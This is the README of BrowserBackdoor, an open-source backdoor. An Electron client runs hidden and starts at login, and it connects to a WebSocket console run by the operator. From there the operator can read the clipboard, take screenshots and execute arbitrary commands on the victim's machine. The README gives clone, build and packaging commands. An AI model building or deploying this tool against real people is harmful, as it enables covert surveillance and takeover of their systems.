BrowserBackdoor is an Electron application that uses a JavaScript WebSocket Backdoor to connect to the listener.
BrowserBackdoorServer is a WebSocket server that listens for incoming WebSocket connections and creates a command-line interface for sending commands to the remote system.
The JavaScript backdoor in BrowserBackdoor can be used on all browsers that support WebSockets. It will not have access to the Electron API of the host computer unless the BrowserBackdoor Client application is used.
Some things you can do if you have access to the Electron API:
- Open new browser windows that can point to any website. (already built-in. See: server/modules/openURL.js ).
- Change and read the clipboard. (already built-in. See: server/modules/readClipboard.js and server/modules/writeClipboard.js ).
- Take screenshots. (already built-in. See: server/modules/screenshot.js ).
- Execute arbitrary system commands. (already built-in. See: server/modules/execCommand.js )
Usage
The client application will run in the background and provide no user interface while running. To check that it's running, quit it, or enable/disable system startup press Command (OS X) OR Control (Windows/Linux) + Alt + \ or whatever you configured the shortcut as in client/main.js.
The server application's usage can be accessed by typing help in the command line.
Installing
NodeJS and NPM are required for BrowserBackdoor.
Ruby 2.1+ and the gems in the Gemfile are required for BrowserBackdoorServer.
BrowserBackdoor is supported on all devices supported by Electron. Currently that is Windows 32/64, OS X 64, and Linux 32/64 .
BrowserBackdoorServer has been tested on Ubuntu 14.04, Debian 8, and Kali Linux. It should work on any similar Linux operating system.
To install anything, first, clone the repository. All the rest of the commands shown assume you are in the root of the repository.
git clone https://github.com/IMcPwn/browser-backdoor
cd browser-backdoor
cd client
npm install
# Configure index.html and main.js before the next command
npm start
cd client
npm install electron-packager -g
electron-packager . --all
cd server
gem install bundler
bundle install
# Configure config.yml before the next command
ruby bbsconsole.rb
Screenshots of the console
The blank space in the pictures where it looks like there is missing text are redacted unique identifiers for sessions.
- The command line console with default configuration.
- The help screen (text will change over time).
- What it looks like when a session is opened (3 in this case).
- Sending a command to all sessions (as seen by session ID -1).
- Targeting a specific session then taking a screenshot of the client.
The screenshot will be saved as a base64 encoded string in a .txt file as shown because it it so large (over 190,000 characters). To view the image you will need to delete everything in front of the one comma in the text file, then base64 decode the result. Save that as a .png file and you will have a screenshot at the maximum resolution of the client!